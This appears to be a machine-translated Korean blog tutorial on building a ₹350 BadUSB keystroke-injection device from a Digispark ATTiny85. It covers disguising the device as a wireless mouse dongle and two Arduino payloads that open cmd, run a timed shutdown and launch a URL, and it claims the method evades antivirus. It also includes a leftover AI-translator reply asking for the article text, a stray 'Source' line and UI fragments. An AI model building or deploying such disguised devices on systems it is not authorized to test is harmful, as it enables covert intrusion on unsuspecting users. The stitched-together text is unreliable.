인도에서 가장 저렴하고 가장 효과적인 Penetration Testing 도구 만드는 방법 🔥
I’m happy to translate the article for you, but I’ll need the full text of the article (the content you’d like translated). Could you please paste the article’s text here? Once I have it, I’ll provide the Korean translation while keeping the source link and formatting unchanged.
Introduction
사이버 전사 여러분, 안녕하세요! 보안 연구원들이 단순한 USB 스틱 하나로 전체 네트워크를 무너뜨리는 놀라운 데모를 어떻게 만드는지 궁금하지 않으셨나요? 준비하세요 – 전설적인 Digispark ATTiny85를 이용한 HID (Human Interface Device) attacks의 세계로 깊이 들어갑니다 – 주머니를 비우지 않고 침투 테스트 영광을 얻을 수 있는 티켓이죠! 💸
우리는 최소 비용으로 최대 효과를 내는 달인인 나라(जैसे कि मुंबई में 10 फ़ुट के कमरे में 5 लोग रहना)에서 왔기에, 합리적인 도사 하나 가격으로 전문적인 펜테스팅 도구를 만들 수 있다는 것이 놀랍지 않을 겁니다! 😂
이제 ₹350 chip을 보안 전문가의 비밀 무기로 바꾸는 이 놀라운 여정을 시작해 봅시다.
목표
우리의 주요 목표(드럼롤 부탁해요 🥁)는 저렴하고 은밀한 HID 장치를 만들어 무선 마우스/키보드 동글을 흉내 내고 삽입되는 즉시 사전 프로그래밍된 공격을 자동으로 실행하도록 하는 것입니다. 목표 시스템에 닿는 순간 작동하는 개인 디지털 자두라고 생각하면 됩니다.
🎯 구체적인 목표
- ₹500 이하의 기능적인 HID 공격 장치 제작.
- 정품 무선 마우스 동글처럼 보이게 만들기.
- 자동 페이로드 시퀀스 실행:
- 시스템 깨우기.
- 특정 URL을 열어 브라우저 실행.
- 브라우저 닫기.
- 종료 명령 실행.
- 공격 후에도 장치가 HID 기능을 유지하도록 하여 은밀성 확보.
- 전통적인 안티바이러스 솔루션에 탐지되지 않도록 유지(레이다 아래에서 날아다니는 느낌이라면 🦅).
하드웨어 요구 사항
메인 하드웨어 (우리 이야기의 영웅)
- Digispark ATTiny85 USB 개발 보드 – ₹350‑500
Techtonics 구매 링크
이 작은 보드는 매달 차를 사는 비용보다 저렴하지만, 패치되지 않은 시스템에는 더 위험합니다! 💻💥
선택적 액세서리 (우리 장난감을 꾸미고 싶을 때)
| 아이템 | 대략적인 비용 | 비고 |
|---|---|---|
| USB 인클로저/케이스 | ₹100‑200 | 프리미엄 무선 마우스 동글처럼 멋지게 보이게 합니다 |
| USB 연장 케이블 | ₹50 | 부품을 수확할 때 유용합니다 |
| 브레드보드 점퍼 와이어 | ₹30 | 이미 포함되지 않은 경우에 필요합니다 |
| 납땜 키트 | ₹200‑500 | 지역 전자 부품 상점 |
💡 프로 팁: 오래된 USB 장치에서 부품을 재활용하세요. 인도 가정에서는 버리는 것이 없습니다! 🏠🗑️
기타 대안 (더 많이 쓰고 싶은 분들을 위해 💸)
-
Arduino Pro Micro – ₹600‑800
Robokits 구매 링크 -
프리메이드 BadUSB 모듈 – ₹800‑1200
Nilgiri Stores 구매 링크
하지만 같은 것을 더 적게 만들 수 있다면 왜 더 많이 쓰나요? “싼 금은 은보다도 더 빛난다!”
소프트웨어 요구사항
Arduino IDE (보스 소프트웨어) 👑
무료이며 오픈‑소스입니다. 다운로드하지 않을 변명이 없습니다.
🔗 다운로드:
Digistump 보드 패키지 (마법 같은 추가 기능)
-
Arduino IDE를 엽니다 → File → Preferences.
-
**“Additional Boards Manager URLs”**에 다음을 붙여넣습니다:
http://digistump.com/package_digistump_index.json -
OK를 클릭합니다.
-
Tools → Board → Boards Manager로 이동합니다.
-
**“Digistump”**를 검색하고 **“Digistump AVR Boards”**를 설치합니다.
💡 새로운 TV 채널을 추가하는 것과 같습니다 – 갑자기 훨씬 더 멋진 콘텐츠를 볼 수 있게 됩니다!
Source: …
How To: The Complete DIY Guide 🛠️
Step 1 – Assembling Hardware (Or Not Assembling, Depending on Your Mood)
The Digispark comes pre‑assembled, so you can plug it in… well, almost!
Option 1: Plug & Play
- Use the existing micro‑USB connector. Fast, easy, no soldering required. Perfect for those who hate DIY.
Option 2: Stealth Mode (काला घोड़ा अंधेरे में दौड़ता है)
- Desolder the micro‑USB connector (if you’re brave enough 🤯).
- Salvage an old USB‑A male connector (from a broken mouse or extension cable).
- Solder wires directly to the ATTiny85 pins:
- VCC → 5 V
- GND → GND
- D+ → Pin 3
- D‑ → Pin 4
- Enclose everything in a USB‑shaped case.
- Add hot glue for that premium, waterproof feel! 😎
Step 2 – What Will We Do Exactly?
The (authorized) evil plan:
- Wake a sleeping computer.
- Open a browser to a specified URL.
- Close the browser.
- Open Command Prompt (CMD).
- Execute a shutdown command with a 60‑second countdown.
- Keep mouse functionality so the device looks like a genuine wireless mouse dongle.
Step 3 – The Payload (What Makes This Device Dangerous) 😈
#include "DigiKeyboard.h"
void setup() {
DigiKeyboard.delay(3000); // Give the host time to recognize the device
DigiKeyboard.sendKeyStroke(0); // Initialize
DigiKeyboard.delay(100);
// Wait for system to fully wake up
DigiKeyboard.delay(3000);
// Open Run dialog (Windows+R)
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
// Type cmd and press Enter
DigiKeyboard.print("cmd");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
// Execute shutdown command (adjust as needed)
DigiKeyboard.print("shutdown /s /t 60");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
// Open default browser to a URL (example: https://example.com)
DigiKeyboard.print("start https://example.com");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(2000);
// Close the browser (Alt+F4)
DigiKeyboard.sendKeyStroke(KEY_F4, MOD_ALT_LEFT);
DigiKeyboard.delay(500);
}
void loop() {
// Keep the device acting as a normal mouse/keyboard after the payload
}Feel free to modify the payload to suit your testing scenario.
Final Thoughts
₹350‑500 예산과 몇 가지 기본 도구, 그리고 약간의 호기심만 있으면 무해해 보이는 마우스 동글처럼 보이는 강력한 HID 공격 플랫폼을 만들 수 있습니다. 책임감 있게 사용하고, 명시적인 허가를 받은 시스템에서만 테스트하며, 항상 윤리적 가이드라인을 따르세요. 즐거운 해킹 되세요! 🚀
Digispark HID 공격 페이로드
#include
void setup() {
// Give the computer time to recognize the device
DigiKeyboard.delay(5000);
// Open Run dialog (Win + R)
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
// Launch Chrome/Edge with the specified URL
DigiKeyboard.print("chrome.exe https://nitinkumar30.netlify.app/");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(8000);
// Close browser
DigiKeyboard.sendKeyStroke(KEY_F4, MOD_ALT_LEFT);
DigiKeyboard.delay(1000);
// Open CMD
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print("cmd");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
// Execute shutdown command
DigiKeyboard.print("shutdown /s /t 60");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
}
void loop() {
// Nothing to do here (single‑shot attack)
}📺 전체 화면 제어
- 전체 화면 모드 진입
- 전체 화면 모드 종료
💡 Understanding the Payload
DigiKeyboard.delay()– 시스템이 동작을 처리할 시간을 줍니다.sendKeyStroke(KEY_R, MOD_GUI_LEFT)– Windows Key + R을 누르는 것과 동일합니다.DigiKeyboard.print()– 텍스트 문자를 입력합니다.MOD_ALT_LEFT/MOD_GUI_LEFT– 수정자 키 (Alt, Windows 키).
단계 4: 페이로드 업로드 지침 (진실의 순간! ⚡)
-
Arduino IDE 열기 – Digistump 패키지가 설치되어 있는지 확인하세요.
-
보드 설정 선택 –
Tools → Board → Digispark (Default - 16.5 MHz) -
페이로드 코드를 붙여넣기 – 위의 코드 블록을 복사해서 IDE에 붙여넣으세요.
-
Verify 클릭 – 컴파일 오류가 없는지 확인하세요.
-
Upload 클릭 – 업로드는 디바이스를 연결하기 전에 시작됩니다.
-
지금 (오직 지금) Digispark을 연결하세요 – 연결되는 순간 디바이스가 코드를 받습니다.
-
성공 메시지를 확인하세요:
Micronucleus done. Thank you!
⏰ 중요한 타이밍 팁: Upload을 클릭한 후 디바이스를 연결할 때까지 60초가 있습니다. 잊어버리기 쉬우면 알람을 설정하세요! ⏰
테스트 및 배포 (재미있는 부분! 🎯)
안전 테스트 프로토콜
- 본인 소유이거나 명시적인 허가를 받은 테스트용 컴퓨터를 사용하세요.
- 작업을 모두 저장하세요 (데이터를 잃는 사람은 없습니다!).
- Digispark를 연결하고 페이로드 실행을 관찰하세요.
- 종료 명령이 실행되면, CMD에
shutdown /a를 입력해 빠르게 취소하세요.
배포 팁
- 공격 후에도 장치는 HID 기능을 유지하여 정상적인 마우스로 보입니다.
- 대부분의 시스템은 USB 기반 HID 장치를 안티바이러스에서 스캔하지 않으므로 이 방법이 효과적입니다.
보안 전문가 팁: 이 공격은 악성 파일을 떨어뜨리는 것이 아니라 키보드 입력을 주입하기 때문에 기존 안티바이러스 탐지를 우회합니다.
왜 이 방법은 마법처럼 작동하는가 ✨
탐지 불가 및 은밀함
- 표준 HID 장치처럼 보임 – Digispark은 모든 USB 마우스나 키보드처럼 보입니다.
- 파일 쓰기 불필요 – USB 드라이브와 달리 저장소로 마운트되지 않으므로 파일 기반 AV가 스캔할 수 없습니다.
- 키보드/마우스 입력 – AV는
shutdown /s키스트로크를 표시하지 않습니다. - 외형 – 적절한 케이스를 사용하면 무선 마우스 동글처럼 보여 무해해 보입니다.
말하길, 가장 좋은 은신처는 눈에 띄는 곳이다! 🙈
법적·윤리적 알림 (자만하기 전에 꼭 읽어보세요! ⚠️)
🚨 중요한 비즈니스 섹션 – 반드시 주의 깊게 읽으세요 🚨
This technique is extremely powerful and should only be used in authorized penetration‑testing scenarios with:
- 시스템/네트워크 소유자의 서면 허가.
- 관련 기관의 적절한 문서화 및 승인.
- 현지 규정 준수 (예: 인도 IT법 2000).
- 취약점이 발견될 경우 책임 있는 공개 절차.
❌ 금지 사항
- 무작위 공공 컴퓨터(예: 사이버 카페)에 연결하지 마세요.
- 친구를 놀리는 용도로 사용하지 마세요.
- 명시적인 서면 허가 없이 소유하지 않은 시스템을 테스트하지 마세요.
- 농담이라고 생각해 직장을 위험에 빠뜨리거나 법적 책임을 지지 마세요.
✅ 권장 사항
- 인증된 펜테스트 작업에서만 사용하세요.
- 모든 테스트 활동을 문서화하세요.
- 책임 있는 공개 절차를 따르세요.
- 조직에 USB 보안 위험에 대해 교육하세요.
요약
시스템 종료 명령이 실행되는 것보다 더 빠르게 마무리해봅시다! 😂
우리가 다룬 내용:
- ₹500 이하로 전문급 HID 공격 장치를 구축하기.
- 정품 무선 마우스 동글처럼 보이게 만들기.
- 파일 기반 안티바이러스 탐지를 우회하는 자동 페이로드를 실행하도록 프로그래밍하기.
- 비용을 최소화하면서 기술적인 측면을 이해하기.
주요 포인트
| 기능 | 설명 |
|---|---|
| 비용 효율적 | ~₹350 하드웨어로 전문적인 기능을 제공합니다. |
| 탐지 불가 | 정품 HID 장치처럼 보입니다. |
| 자율적 | 사용자 개입 없이 공격을 실행합니다. |
| 재사용 가능 | 다양한 페이로드에 맞게 재프로그래밍할 수 있습니다. |
| 은밀함 | 위장을 위해 마우스 기능을 유지합니다. |
The Digispark ATTiny85는 침투 테스트 하드웨어의 “Aam Aadmi”(일반인)와 같습니다 – 저렴하고 접근하기 쉬우며 놀라울 정도로 효과적입니다. 보안 전문가이든, 연구자이든, 취미로 하든, 이 장치는 때때로 가장 저렴한 솔루션이 가장 강력할 수 있음을 증명합니다.
기억하세요: 큰 힘(그리고 저렴한 하드웨어)에는 큰 책임이 따릅니다! 👨💻✨